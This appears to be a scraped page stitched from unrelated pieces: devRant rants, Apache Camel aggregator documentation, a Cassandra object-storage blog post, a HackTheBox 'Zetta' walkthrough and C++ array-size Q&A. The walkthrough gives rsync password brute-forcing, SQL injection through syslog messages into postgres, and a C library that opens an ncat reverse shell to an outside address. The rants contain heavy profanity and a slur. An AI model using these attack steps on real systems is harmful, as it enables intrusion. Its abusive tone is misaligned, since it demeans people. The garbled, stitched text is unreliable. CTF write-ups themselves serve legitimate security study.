For all you know, Google, there is such thing as QR codes - and customers can just scan the code (or type in that sweet address). Voila! Boom!!! Ching-ching! Hello-hello, monopolistic cashgrabage! I came to inform you that your TWA bullshit is unneeded in ETHICAL space. The only ones who would benefit from this thing are permission-hungry publishers. And I'm already sick of this culture where people are put into store bubbles. You can't hide the fact that this data and features you provide, with "native" layer, may be misused in a jiffy - and by big players, no less. Of course, as a vile dumpster that you are, you don't mind it. Don't even bring up a battery consumption that comes with PWA and browser. This doesn't matter if you use an app for some 2 minutes to tick your mental checkboxes! I'm just sick of app stores and native apps that collect the data without normal warning, and dare to take more than 1 second to fucking load the cached data. Take a lesson or two from PWAs that collect (probably useful) cache, instead of my specs, and load almost instantly.11 - FUCK YOU PHP, FUCK YOU SYMFONY AND DEFINITELY FUCK YOU SHOPWARE. Don't get me wrong, PHP has evolved a lot, but the stuff people are building with it is just the biggest load of fucking shit I have ever seen: Shopware. Shopware is the most ass-sucking abomination to extend. It's nearly impossible to develop anything beyond "use the standard features and shut the fuck up" that is more sophisticated than a fucking calculator. The architecture of this pile of crap is the worst bullshit ever. A mix of OOP, randomly making use of non OOP concepts and features together with the unnecessarily HUGE amount of useless interfaces and classes. Sometimes I feel like it's 90% fucking shitty boilerplate shit. And don't get me started with TWIG. It's a nice thought, but WHY THE BLOODY FUCK WOULD YOU NOT USE VUE IF YOU ARE ALREADY USING IT FOR A DIFFERENT PART OF SHOPWARE. This makes no fucking sense whatsoever and makes development of new features a huge pain in the ass. I can't comprehend how people actually like using this shit. OH AND THE DATABASE. OH MY FUCKING GOD. This one is bad. Ever tried to figure anything out in a database where random strings (yes MySQL "relational" - you might think) that are stored as text in a JSON format make up some object or relations during runtime?? Why the fuck do you have foreign and primary keys if you don't use them properly?? Seriously you can't even figure out which data belongs to what because the architecture just sucks fucking ass. FUCK YOU Shopware wankers, you suck, your product sucks, your support sucks, your architecture sucks and you keep releasing new versions that regularly break shit even in minor versions. I used to like PHP, but not in projects like these - The install will take about one more minute… *go make a cup of tea, pack for holiday, go on holiday, return from holiday* Ah still installing for one more minute my old friend - Wow i left this platform for almost a year because you guys were to right wing political and after 2 minutes of reading again i see some right wing conservative bullshit. You should just solve in reddit. I deinstall now.14 - My biggest challenge is not telling the people who wrote code I get to maintain that it is a big pile of shit. My fear is I will forget I wrote said code and proceed to complain about said code. Then someone will point it out that I wrote said code. So it is kind of a self preservation strategy. 
Also, in meetings, when my boss calls something a "piece of software", I have to refrain from giggling.3 - - what is your "dev sitting in a dumbfuck meeting being forced to waste their time listening to bullshit" spirit animal? mine is katsuki bakug - Thanks google for creating the illusion of an option to change the shipping address for a repair order. You even mention the new address in your notification email, but when I click on UPS tracking, I can see that you sent the shipment to the old address, which is in a different city where I can't quickly go to pick up my repaired phone. After charging an extra 95,- Euros for additional damage supposedly not covered by my warranty. Lucky you that my old phone had connection problems with the shitty Vodafone station wi-fi router, which is one of the few reasons that I still even want to use a google hardware product. Thanks google for just being slightly less wretched and mediocre than your competitors, that might grant you some more years before you will be buried in history forever. Pixel phones are just like Macbooks: high quality product and good marketing, good enough to make your customer accept everything else being bullshit. Google search is even worse, but based on the same concept: just suck a little less than your competitors but don't waste any effort trying to actually be really good at anything - Ok so I have - a legal structure (or several of them actually) - infrastructure - website design is being made - logo and visual identity - one client and a pet project for portefolio What I need: - clients How I do that: - Buying leads and paying a dude to call them - Paying a CM - Networking (I guess) - Printing posters and putting them all over Paris, LDN, Barcelona and Berlin. Am I doing this right? I really don' wanna take another bullshit job just to pay the bills. I wanna go back to doing cool shit for radio stations and restaurants and stuff. Do the UX, get a design, create them a remix + headless strapi plus some random shit if needed. Get paid. Rince. Repeat3 - - Any advice on how to find proper customer as a freelancer? Should I go on fiverrr and pay for coldcalling and an assistant? Because honestly I'm sick of corporations employing me (my company) for the sake of not paying taxes but still expecting a 9 to 5 and all the corporate bullshit. I just want to get customer, do UX, pay a designer, get figmas, implement, invoice, repeat. Not have 3 hours spring grooming calls stuck between a team meeting with management, a demo and a mid-spring alignment review. Is that too much to ask?7 - This jobhunting with recruiters is such bullshit. Haha. I'm gonna troll my way away from them fuckwits.1 - - Getting super demotivated looking at job postings on both indeed and glassdoor - they all seem like the same generic bullshit of maintaining some website... does anyone have suggestions of how to find companies that are building exciting products that aren't dinosaurs?8 - MySQL Innodb easily get crashed, bullshit, I just restarted my server now all databases get corrupted. F*ck you OVH3 - - I think you already know by now, but I have to say it. The update of the discord app is utter shit, brought only downgrades to me and they still refuse to fix bug that have been prevalent on their platform for years to force their shiny, new, untested bullshit down your throat - you know they call me 'good' which in their speech is an insult. do they ever pay fucking attention or can they not conceive of what a real human is like ? 
especially one that is conflicted on various levels as a result of abuses, loneliness, depression, survival interests, years of bullshit, etc ? I'm not immune to temptation or corruption, I'm just extremely resistant. - - - I implore ANYONE... please... Have you EVER written a SINGLE Jest test that didn't have some sort of bullshit spewing stuff like this: "ReferenceError: You are trying to `import` a file after the Jest environment has been torn down." "Warning: React.createElement: type is invalid -- expected a string (for built-in components) or a class/function (for composite components) but got: object. You likely forgot to export your component from the file it's defined in, or you might have mixed up default and named imports." and yet running on a device, features work flawlessly and quite well, no errors or even warnings in sight logged This is the most fragile pile of garbage I have ever seen. I hate this. inb4 your stupid ass todo boilerplate garbage you wrote tests for in freshman year. i'm talking about a REAL app with HUNDREDS of components. where the grownup testing tools at? it's a question I've still not answered after a year of fucking around with this framework2 - - I swear to god, getting Chumsky to do my bidding has almost taken longer than writing a parser by hand. I'm not looking for operator precedence, I'm not looking for complicated rules or anything, the main part of my language is literally just S-expressions, with some top level bells and whistles. I don't even have a working lexer yet because I wanted to use this piece of shit library which usually matches the fewest possible characters to parse significant newlines but the Padded combinator takes as much whitespace at the end as it can find, and a host of other atomics don't actually adhere to the library's lazy principle in their procedural implementation. I've had enough. I'm going to bed, and tomorrow I'm writing tickets. Actually, I'll probably also write PRs because I actually want the fixes to exist and not just complain about the problems, but I also really want to complain before I get started on that because I spent about two weeks just on this bullshit.3 - I have to participate in this retarded conference for 2 days and then I will have to join this fucking summer gathering on my weekend and that will take whole day. Fuck this fucking corporate bullshit. Better give me a fucking raise or better yet start fucking managing this scrum team because half of devs are not pulling their fucking weight. Fucking BA too lazy to update issues with new details after grooming so each time I pick a new task I either have to somehow remember what we discussed weeks ago or I have to spam you with questions so you would run around like chicken without head while gathering answers to questions that were already discussed because you are too lazy of a fuck to compile notes. And even that is not enough, my merged MR's apparently dont cover all the use cases because your'e too incompetent to even figure out how our app works and define properly the task. And then theres supposedly a techlead dev whos not taking a ticket when theres 3 days left till end of the sprint and he goes: "But a task spillover will happen!!!". Yeah so I guess just sit on your ass and wait for new sprint so you could pick yet again another low hanging fruit task and marinate it for weeks. Motherfucker I checked your MR's in the last 6 weeks you did 1 week worth of work. 
You are a techlead but your only dev colleague is asking us for help daily because you dont even help him Fucking lazy and incompetent bastard. - SAFe PI objective "business value" estimates are complete and utter bullshit. Every objective is a 10? Let's work on all of them in parallel! Fucking genius!2 - anyone made something that sits there and tells youtube to filter out content from other history lists and or certain subject material to allow something not inundated by their 'it' bullshit to shine through ? also, this time, how about you all take pictures of seeming parents so their children's locations are accounted for at all times and the child traffickers working on camera here can get caught ? they wouldn't be able to say kill their captives if they absence of the child was noted. Top Tags
https://devrant.com/search?term=bullshit
CC-MAIN-2022-40
en
refinedweb
Correlation key
Messages with the same correlation key are aggregated together, using an AggregationStrategy.
Worker pools
The aggregate EIP will always use a worker pool, which is used to process all the outgoing messages from the aggregator. The worker pool is determined as follows:
- If a custom ExecutorService has been configured, then this is used as the worker pool.
- If parallelProcessing=true, then a default worker pool (10 worker threads by default) is created. However, the thread pool size and other settings can be configured using thread pool profiles.
- Otherwise, a single-threaded worker pool is created.
Aggregating
The AggregationStrategy is used for aggregating the old and the new exchange together into a single exchange, which becomes the next old exchange when the next message is aggregated, and so forth.
Aggregate by grouping exchanges
The aggregated exchanges can also be grouped together, in which case the body of the completed message contains a List of the grouped exchanges, which can be retrieved with getMessage().getBody(List.class).
Aggregating into a List
If you want to aggregate some value from the messages <V> into a List<V> then you can use the org.apache.camel.processor.aggregate.AbstractListAggregationStrategy abstract class. The completed Exchange that is sent out of the aggregator will contain the List<V> in the message body. For example, to aggregate a List<Integer> you can extend this class as shown below and implement the getValue method:
public class MyListOfNumbersStrategy extends AbstractListAggregationStrategy<Integer> {
    @Override
    public Integer getValue(Exchange exchange) {
        // the message body contains a number, so just return that as-is
        return exchange.getIn().getBody(Integer.class);
    }
}
The org.apache.camel.builder.AggregationStrategies class is a builder that can be used for creating commonly used aggregation strategies without having to write a class. The previous example can also be built using the builder as shown:
AggregationStrategy agg = AggregationStrategies.flexible(Integer.class)
    .accumulateInCollection(ArrayList.class)
    .pick(body());
Aggregating on timeout
Aggregate with persistent repository
The aggregator provides a pluggable repository for which you can implement your own org.apache.camel.spi.AggregationRepository. If you need a persistent repository then Camel provides numerous implementations, such as those from the Caffeine, CassandraQL, EHCache, Infinispan, JCache, LevelDB, Redis, or SQL components.
Completion
When aggregating Exchanges, at some point you need to indicate that the aggregated exchanges are complete, so they can be sent out of the aggregator. Completion can be triggered in several ways, for example by a completion size or a completion timeout, by letting the AggregationStrategy override the preComplete method (pre-completion mode), or by an AggregateController, which allows an external source (an AggregateController implementation) to complete groups or all groups; this can be done using the Java or JMX API.
All the different completions are per correlation key, and you can combine them in any way you like; basically, the first one that triggers wins. So you can use a completion size together with a completion timeout. Only completionTimeout and completionInterval cannot be used at the same time. Completion is mandatory and must be configured on the aggregation.
Pre-completion mode
There can be use cases where you want the incoming Exchange to determine whether the correlation group should pre-complete, so that the incoming Exchange starts a new group from scratch. Pre-completion mode must be enabled by the AggregationStrategy by overriding the canPreComplete method to return true. When pre-completion is enabled, the preComplete method is invoked; if it returns true, the existing correlation group is completed without aggregating the incoming exchange (newExchange), as sketched below.
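As a concrete illustration of pre-completion mode, here is a minimal, untested sketch of a strategy that appends string bodies and starts a new group whenever the incoming message carries a hypothetical "reset" header. The header name and class name are invented for the example; only aggregate, canPreComplete and preComplete come from the AggregationStrategy interface described above.
import org.apache.camel.AggregationStrategy;   // Camel 3.x interface
import org.apache.camel.Exchange;

public class ResetAwareAppender implements AggregationStrategy {

    @Override
    public boolean canPreComplete() {
        // enable pre-completion mode
        return true;
    }

    @Override
    public boolean preComplete(Exchange oldExchange, Exchange newExchange) {
        // complete the current group (without aggregating newExchange)
        // when the incoming message carries the hypothetical "reset" header
        return newExchange.getIn().getHeader("reset") != null;
    }

    @Override
    public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {
        if (oldExchange == null) {
            // first message in the group
            return newExchange;
        }
        String body = oldExchange.getIn().getBody(String.class)
                + newExchange.getIn().getBody(String.class);
        // append the new body onto the aggregated body
        oldExchange.getIn().setBody(body);
        return oldExchange;
    }
}
With such a strategy on an aggregate EIP, each message carrying the reset header closes the running group and then becomes the sole member of a fresh group.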
When preComplete returns true, the newExchange is used to start the correlation group from scratch, so the group contains only that new incoming exchange. This is known as pre-completion mode. When the aggregation is in pre-completion mode, only the following completions are in use:
- completionTimeout or completionInterval can also be used as fallback completions
- any other completion is not used (such as by size, from batch consumer, etc.)
- eagerCheckCompletion is implied as true, but the option has no effect
CompletionAwareAggregationStrategy
If your aggregation strategy implements CompletionAwareAggregationStrategy, then Camel will invoke the onComplete method when the aggregated Exchange is completed. This allows you to do any last-minute custom logic, such as cleaning up resources or doing additional work on the exchange now that it is completed. You must not throw any exceptions from the onCompletion method.
Completing the current group decided from the AggregationStrategy
The AggregationStrategy supports checking for the exchange property (Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP) on the returned Exchange, which contains a boolean indicating whether the current group should be completed. This allows you to overrule any existing completion predicates / sizes / timeouts etc. and complete the group. For example, logic that completes the group when the message body size is larger than 5 does so by setting the exchange property Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP to true on the returned exchange.
Completing all previous groups decided from the AggregationStrategy
The AggregationStrategy can likewise check an exchange property on the returned exchange indicating whether all previous groups should be completed. This allows you to overrule any existing completion predicates / sizes / timeouts etc. and complete all the existing previous groups. Logic that completes all the previous groups and starts a new aggregation group does so by setting the property Exchange.AGGREGATION_COMPLETE_ALL_GROUPS to true on the returned exchange.
You can also use an AggregateController to force the aggregator to complete. The returned value is the number of groups completed; for example, a value of 1 is returned if the foo group existed, otherwise 0 is returned. There is also a method to complete all groups:
int groups = controller.forceCompletionOfAllGroups();
The controller can also be used in XML DSL using the aggregateControllerRef attribute to refer to a bean with the controller implementation, which is looked up in the registry. When using Spring XML you can create the bean with <bean>. A Java sketch of using the controller is shown below.
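The code that demonstrated the controller was lost in extraction; the following is a rough, untested reconstruction assuming Camel 3.x, where AggregateController and DefaultAggregateController live in org.apache.camel.processor.aggregate and the Java DSL exposes an aggregateController() option. Treat the package name, the option name, the "myGroup" header and the class names as assumptions; MyListOfNumbersStrategy is the strategy shown earlier on this page.
import org.apache.camel.builder.RouteBuilder;
import org.apache.camel.processor.aggregate.AggregateController;
import org.apache.camel.processor.aggregate.DefaultAggregateController;

public class ControlledAggregationRoute extends RouteBuilder {

    private final AggregateController controller = new DefaultAggregateController();

    @Override
    public void configure() {
        from("direct:start")
            // MyListOfNumbersStrategy is the AbstractListAggregationStrategy example above
            .aggregate(header("myGroup"), new MyListOfNumbersStrategy())
                .aggregateController(controller)   // make the controller drive this aggregator
                .completionSize(100)
            .to("mock:result");
    }

    public int completeFoo() {
        // force completion of the "foo" correlation group; returns 1 if it existed, otherwise 0
        return controller.forceCompletionOfGroup("foo");
    }

    public int completeAll() {
        // force completion of all groups; returns the number of groups completed
        return controller.forceCompletionOfAllGroups();
    }
}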
Aggregating with Beans
To use the AggregationStrategy you had to implement the org.apache.camel.AggregationStrategy interface, which means your logic is tied to the Camel API. Instead, you can use a plain bean for the logic and let Camel adapt to your bean. To use a bean, a convention must be followed:
- there must be a public method to use
- the method must not be void
- the method can be static or non-static
- the method must have 2 or more parameters
- the parameters are paired, so the first half applies to the oldExchange and the remaining half to the newExchange; therefore there must be an even number of parameters, e.g. 2, 4 or 6
The paired parameters are expected to be ordered as follows:
- the first parameter is the message body
- optionally, the 2nd parameter is a Map of the headers
- optionally, the 3rd parameter is a Map of the exchange properties
For example, with 4 parameters the method takes the bodies and headers of the old and new exchange:
public String append(String existing, Map existingHeaders, String next, Map nextHeaders) {
    return existing + next;
}
And finally, if we have 6 parameters, that also includes the exchange properties:
public String append(String existing, Map existingHeaders, Map existingProperties, String next, Map nextHeaders, Map nextProperties) {
    return existing + next;
}
To use this with the aggregate EIP we can refer to the bean class; you can also specify the bean class directly in strategyRef using the #class: syntax as shown:
<route>
  <from uri="direct:start"/>
  <aggregate strategyRef="#class:com.foo.MyBodyAppender" strategyMethodName="append" completionSize="3">
    <correlationExpression>
      <constant>true</constant>
    </correlationExpression>
    <to uri="mock:result"/>
  </aggregate>
</route>
You can use this form of XML DSL when you are not using the classic Spring XML files, i.e. where XML is used only for the Camel routes.
Aggregating when there is no data
When using a bean as the AggregationStrategy, the method is only invoked when there is data to be aggregated, meaning that the message body is not null. If you want the method to be invoked even when there is no data (the message body is null), then set strategyMethodAllowNull to true. This also matters for timeout-based completion: if, say, a timeout is hit after 1 second and we need to do special merge logic for that case, we would need to set setAllowNullNewExchange=true; if we don't do this, then on timeout the bean method is not invoked.
Aggregating with different body types
When, for example, strategyMethodAllowNull is true, the parameter types of the message bodies do not have to be the same. For example, suppose we want to aggregate from a com.foo.User type into a List<String> that contains the user names. We could code the bean as follows:
public final class MyUserAppender {
    public List addUsers(List names, User user) {
        if (names == null) {
            names = new ArrayList();
        }
        names.add(user.getName());
        return names;
    }
}
Notice that the return type is a List, which we want to contain the names of the users. The 1st parameter is the List of names, and the 2nd parameter is the incoming com.foo.User. A Java DSL route that wires a bean method up as the aggregation strategy is sketched below.
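For completeness, here is a minimal sketch of the same wiring in the Java DSL. It assumes the AggregationStrategies.bean(...) builder adapts a bean method in the same way strategyRef/strategyMethodName do in the XML above, and it reuses the hypothetical com.foo.MyBodyAppender class from that example.
import org.apache.camel.builder.AggregationStrategies;
import org.apache.camel.builder.RouteBuilder;

public class BeanAggregationRoute extends RouteBuilder {
    @Override
    public void configure() {
        from("direct:start")
            // adapt the bean method "append" to an AggregationStrategy
            .aggregate(constant(true), AggregationStrategies.bean(com.foo.MyBodyAppender.class, "append"))
                .completionSize(3)
            .to("mock:result");
    }
}
The route behaves like the XML version: a constant correlation expression puts every message in one group, and the group completes after three messages.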
https://camel.apache.org/components/3.12.x/eips/aggregate-eip.html
CC-MAIN-2022-40
en
refinedweb
Why Cassandra is a poor choice for an object storage metadata database
Jonathan Symonds, January 24, 2021
Cassandra is a popular, tried-and-true NoSQL database that supports key-value wide-column tables. Like any powerful tool, Cassandra has its ideal use cases – in particular, it excels at write-heavy workloads while having limitations with read-heavy workloads. Cassandra's eventual consistency model and its lack of transactions and of multi-table features such as joins and subqueries can also limit its usefulness. However, using Cassandra as a metadata database for an object storage system introduces significant complexity, resulting in data integrity and performance issues at scale – particularly if one wants to use the object store as a primary storage system. Object storage needs are far simpler than, and different from, what Cassandra is built for. Because the implications of employing Cassandra as an object storage metadata database were not properly understood, many object storage vendors made it a foundational part of their architecture – and unfortunately it keeps them from ever moving past simple archival workloads into the modern workloads that define the future of object storage (AI/ML, analytics, web/mobile applications). Let's explore why in a little more detail.
Cassandra was never designed to manage file or object storage metadata, and it is predictably weak in this regard. It is not ACID compliant. It does not have the rigidity to prevent partially successful writes, duplicates, contradictions and the like. Cassandra does not support joins or foreign keys, and consequently does not offer consistency in the ACID sense. Further, there is no capacity to roll back transactions in the event of a failure. While Cassandra supports atomicity and isolation at the row level, it trades transactional isolation and atomicity for high availability and fast write performance.
Cassandra is categorized as an AP system in CAP terms, meaning it trades consistency for availability and partition tolerance. When employing Cassandra as a metadata database for an object store, you can either be fast or consistent – but not both at the same time. Cassandra's tunable consistency is a compromise, not a feature. Any setting other than QUORUM or ALL means you are at risk of reading stale data. It is important to apply this consistency setting for both read and write operations, in addition to the object data operations performed outside of it. In the object storage world, the implication is that you can either be good for archival use cases (write once, read very infrequently) or you choose a different architecture.
Similar to the consistency problem, the durability guarantee is also a tradeoff between performance and correctness. The storage engine's default commit log is set to sync periodically every 10 seconds. This means you will lose up to 10 seconds' worth of the latest updates in the event of a power failure. The only reasonable way to make Cassandra durable is to use the synchronous batch-mode committer, which comes with a performance penalty.
Cassandra's high-availability guarantee is not suited for erasure-coded object stores. With a replication factor of 3 and a consistency quorum of 2, Cassandra can only tolerate a single node / drive failure within a replication group. Increasing the replication factor and quorum consistency to 5 or higher only makes the metadata performance go from bad to worse.
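To make the tunable-consistency point concrete, here is a small, illustrative sketch of what a metadata lookup at QUORUM looks like, which is roughly the minimum an object store would need for read-after-write behaviour. It assumes the DataStax Java driver 4.x; the keyspace, table and column names are invented for the example.
import com.datastax.oss.driver.api.core.ConsistencyLevel;
import com.datastax.oss.driver.api.core.CqlSession;
import com.datastax.oss.driver.api.core.cql.Row;
import com.datastax.oss.driver.api.core.cql.SimpleStatement;

public class MetadataLookup {
    public Row headObject(CqlSession session, String bucket, String key) {
        // QUORUM (2 of 3 replicas with RF=3) is the weakest level that avoids
        // reading stale metadata when writes also use QUORUM. Even then it
        // only survives a single replica failure per replication group.
        SimpleStatement stmt = SimpleStatement
                .newInstance("SELECT etag, size FROM objstore.object_meta WHERE bucket = ? AND key = ?",
                        bucket, key)
                .setConsistencyLevel(ConsistencyLevel.QUORUM);
        return session.execute(stmt).one();
    }
}
The same level has to be applied on the write path; dropping either side to ONE buys back latency at the price of exactly the stale reads described above.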
Unlike replication, erasure coding can tolerate multiple server and drive failures in a distributed system. Even if you have configured the erasure code setting to 6 parity (any 6 nodes may fail) in a 16 node setup, you are still limited by the weak link, i.e. Cassandra's replication factor. The ops team is often unaware of these high-availability surprises until it is too late.

Object storage systems organize the data in a tree-structured hierarchical namespace. Since Cassandra does not support a hierarchical key namespace, you will have to build a tree data model on top for each directory prefix and also maintain a flat list for direct lookups without a directory walk. Atomically updating multiple tables with a batched commit log and full read / write quorum is slow and prone to corruption.

While objects themselves are immutable, the object storage system is mutable. When you add, remove or overwrite objects and their metadata, apply policies, collect metrics, grant session tokens and rotate credentials, the metadata is always mutating. Cassandra is not designed to handle this level of metadata mutation, and certainly not for primary storage workloads. Long-term archival use cases where the objects are large (GBs in size) and infrequently accessed will work – other use cases will not. The reason is that Cassandra's log-structured storage engine quickly appends new writes to the end of the log file, but defers deletes and overwrites with a tombstone marker. Vacuuming these tombstones is an expensive operation, because the actual delete is applied by copying the SSTables to new tables, sieving out the stale entries in the process. This operation has to be performed on all the nodes simultaneously. If you delay vacuuming, excessive tombstones will result in increased read latencies, memory GC pauses and failed queries. Some object storage vendors use an additional Redis database to offload Cassandra's pressure. Using two databases to manage an object store's metadata is hardly elegant and introduces additional points of failure. The biggest gotcha? You won't see these problems until you are deep into production and it is too late.

Small objects (KB to MB in size) will fill up the metadata drives dedicated to Cassandra much sooner than the data drives. Small-object workloads also exacerbate Cassandra's limitations, because they are sensitive to latency and consistency issues. Some vendors store small objects entirely inside Cassandra to address this problem. At this point, you are merely looking at an S3 proxy on top of a Cassandra database. This too is a bad practice. If you use your object store with erasure coding for large objects and use Cassandra with replication as your data store for small objects, you have introduced a non-trivial SLA problem: the data is protected by different guarantees. Given that drives die all the time, the probability of serving an old object or a corrupted object goes up considerably. As noted above, your metadata database is now the weak link. Availability, consistency and durability guarantees are only as good as the weakest link. If the weakest link employs replication (three copies), you can only withstand a one-node or one-drive failure before losing data. A counter-argument might be to replicate five copies. The result is a massive performance hit, and you can still really only withstand a two-node or two-drive failure.
By using replication for small objects and erasure coding for large objects you also undermine the efficiency gains associated with erasure coding. If you only use erasure coding for large objects (likely a small percentage of your overall object pool) you don't gain much but increase your exposure considerably. Employing Cassandra as your metadata database for an object store also introduces a troublesome Java dependency, which in turn can result in bloat and memory management issues. Cassandra taxes the JVM memory management with constant large-scale metadata allocation and mutation, resulting in memory exhaustion and garbage collection pauses. The obvious takeaway is that it is a lot more complicated to operate a Cassandra cluster than a properly designed object storage system. Cassandra is built for different purposes, and object-storage metadata is not one of them. The areas where Cassandra struggles are the areas that are core to a performant, scalable and resilient object store. The last point is of note – object storage is a natural fit for blob data, and that is why erasure coding is so effective and efficient. Cassandra is designed for replication. When you use that model for metadata it breaks the object store's erasure coding advantage (or at the very least makes it brittle and prone to breakage). Bottom line: write your metadata atomically with your object. Never separate them. We welcome your comments. Feel free to engage us on Twitter, on our Slack channel or by dropping us a note at [email protected].
https://www.datasciencecentral.com/why-cassandra-is-a-poor-choice-for-an-object-storage-metadata/
CC-MAIN-2022-40
en
refinedweb
#include <Deployment_Configuration.h> Collaboration diagram for CIAO::Deployment_Configuration: This class provides strategies on how the Assembly framework should deploy an assembly. This is achieved by providing mappings from deployment destination names to actual CIAO daemon IORs, and the strategy for which default CIAO daemon a deployment mechanism should use. This is a trivial implementation of the deployment configuration strategy. We can enhance this class later on to provide different deployment location strategies.
https://www.dre.vanderbilt.edu/Doxygen/5.4.1/html/tao/ciao/tools/assembly_deployer/classCIAO_1_1Deployment__Configuration.html
CC-MAIN-2022-40
en
refinedweb
Zetta @ HackTheBox
xct

Zetta is a 40-point machine on hackthebox. We will get the IPv6 address of the box via FTP, use rsync to get access to SSH and finally abuse an SQL injection in rsyslogd to get root.

User Flag

Open ports:
21/tcp open ftp
22/tcp open ssh
80/tcp open http

On the website on port 80 we see a long string being shown as a potential FTP password, which is generated as follows:

var rString = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ

We can use any 32-character string to connect to FTP, using it as username and password. The website also mentions RFC2428, which describes the two commands EPRT and EPSV. By using EPRT<space><d><net-prt><d><net-addr><d><tcp-port><d> we can get the FTP server to connect to us using its IPv6 address:

nc zetta.htb 21
USER a9407e837fb779abc934d6db89ed4c43
PASS a9407e837fb779abc934d6db89ed4c43
EPRT |2|dead:beef:2::1003|4444|
LIST

Using wireshark we can read its IPv6 address and use it for another port scan (for ease of use I added it to /etc/hosts). This time another port shows up: "8730", which runs rsyncd. We connect and see the following message:

****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******

rsync rsync://zetta6:8730
...
bin Backup access to /bin
boot Backup access to /boot
lib Backup access to /lib
lib64 Backup access to /lib64
opt Backup access to /opt
sbin Backup access to /sbin
srv Backup access to /srv
usr Backup access to /usr
var Backup access to /var

By trial and error we find that the only folder we can download with rsync is "/etc/", which is not listed here. We find the following interesting config file:

cat rsyncd.conf
...
# Syncable home directory for .dot file sync for me.
# NOTE: Need to get this into GitHub repository and use git for sync.
[home_roy]
path = /home/roy
read only = no
# Authenticate user for security reasons.
uid = roy
gid = roy
auth users = roy
secrets file = /etc/rsyncd.secrets
# Hide home module so that no one tries to access it.
list = false

We cannot read the secrets file, but bruteforcing the password gives the correct result in just a few minutes:

for word in $(cat ~/tools/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ); do sshpass -p $word rsync -6 -r rsync://roy@zetta6:8730/home_roy/ .; done

We can now read user.txt as it was synced to our folder. The correct password was "computer". We add our SSH public key to ".ssh/authorized_keys" and upload it, resulting in SSH access as roy:

rsync -vvaP -6 .ssh "rsync://roy@zetta6:8730/home_roy/"

Root Flag

In roy's home folder we see a file ".tudu.xml" with several hints. It suggests looking at logging-related things and postgres. We confirm that postgres is running on 5432 by using ss -ntp. The assumption that we have to deal with something logging-related is also reinforced by the groups we have (includes adm):

uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

We have some logfiles in /var/log/postgresql, for example "postgresql-11-main.log", which is however empty. We open a terminal and run tail -f on the file to monitor it at all times. When trying to log into postgres with a wrong user (psql -U xct) we generate some error messages that we can see in the log. Looking back at the hints xml file we see that git files are mentioned.
By searching for ".git" on the box we get 3 folders:

/etc/pure-ftpd/.git
/etc/nginx/.git
/etc/rsyslog.d/.git

I copied those folders to my local box and looked at the history with git reflog | awk '{ print $1 }' | xargs gitk. There is an interesting line in a commit for rsyslog:

local7.info action(type="ompgsql" server="localhost" user="postgres" pass="test1234" db="syslog" template="sql-syslog")

While the password does not work, this tells us that the "local7.info" log facility is used. By sending messages to the facility we are able to trigger an error message:

logger -p local7.info "'"
...
2019-09-01 05:44:33.721 EDT [22460] postgres@syslog STATEMENT: INSERT INTO syslog_lines (message, devicereportedtime) values (' \'','2019-09-01 09:44:33')

It seems like we can progress by injecting values into log messages, because these are used in a query. We have to deal with escaping single quotes here, because they get changed to \'. A way to accomplish this in postgres is to use $$ to replace all single quotes. We have to be a bit careful though, because $$ is also a bash thing, so we have to escape that too. We try some things and get a valid query that does not error out, despite the injection:

logger -p local7.info "xct',\$\$2019-09-01 07:55:02\$\$) --"

Postgres supports loading shared libraries via queries so we create one:

# get version with `find / -wholename '*/bin/postgres' 2>&- | xargs -i xargs -t '{}' -V`
sudo apt-get install postgresql-server-dev-11

#include "postgres.h"
#include "fmgr.h"
#include <stdlib.h>

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

Datum exec(PG_FUNCTION_ARGS){
    system("/dev/shm/ncat 10.10.14.5 8000 -e /bin/sh");
};
PG_FUNCTION_INFO_V1(exec);

gcc xct.c -I`pg_config --includedir-server` -fPIC -shared -o xct.so

We upload a static ncat binary and the shared object to "/dev/shm/". Now we can create the queries that load the shared object and give us a shell:

logger -p local7.info "xct',\$\$2019-09-01 07:55:02\$\$); CREATE OR REPLACE FUNCTION exec() RETURNS text AS \$\$/dev/shm/xct.so\$\$, \$\$exec\$\$ LANGUAGE C STRICT; -- "
logger -p local7.info "xct',\$\$2019-09-01 07:55:02\$\$); SELECT exec(); -- "

The shell will die after about 20-30 seconds so we have to be quick. In "/var/lib/postgresql/.ssh/id_rsa" we find an SSH private key for postgres which we can use to connect. The final step is to look at .psql_history and see the password the user has: "sup3rs3cur3p4ass@postgres". Remembering the hints file we infer the root password "sup3rs3cur3p4ass@root" and can su to root. Thanks to jkr for making the box!
https://www.vulndev.io/2020/02/22/zetta-hackthebox/
CC-MAIN-2022-40
en
refinedweb
Query explained: How to find the size of a pointer pointing to an array?

Answer #1: No, you can't. The compiler doesn't know what the pointer is pointing to. There are tricks, like ending the array with a known out-of-band value and then counting the size up until that value, but that's not using sizeof(). Another trick.

Answer #2:

Answer #3:

#include <cstdio>

#if !defined(ARRAY_SIZE)
#define ARRAY_SIZE(x) (sizeof((x)) / sizeof((x)[0]))
#endif

int main()
{
    int days[] = {1,2,3,4,5};
    int *ptr = days;
    printf("%zu\n", ARRAY_SIZE(days));   /* 5 */
    printf("%zu\n", sizeof(ptr));        /* size of the pointer itself */
    return 0;
}

You can google for reasons to be wary of macros like this. Be careful. If possible, use the C++ standard library containers such as std::vector, which are much safer and easier to use.

Answer #4: There is a clean solution with C++ templates, without using sizeof(). The following getSize() function returns the size of any static array:

#include <cstddef>

template<typename T, size_t SIZE>
size_t getSize(T (&)[SIZE])
{
    return SIZE;
}

Here is an example with a foo_t structure:

#include <cstdio>
#include <cstddef>

template<typename T, size_t SIZE>
size_t getSize(T (&)[SIZE])
{
    return SIZE;
}

struct foo_t {
    int ball;
};

int main()
{
    foo_t foos3[] = {{1},{2},{3}};
    foo_t foos5[] = {{1},{2},{3},{4},{5}};
    printf("%zu\n", getSize(foos3));
    printf("%zu\n", getSize(foos5));
    return 0;
}

Output:
3
5

Answer #5:

#include <cstdio>

#define ARRAY_SZ 10

void foo (int (*arr)[ARRAY_SZ])
{
    printf("%zu\n", sizeof(*arr)/sizeof(**arr));
}

int x[20];
int y[10];
foo(&x); /* error */
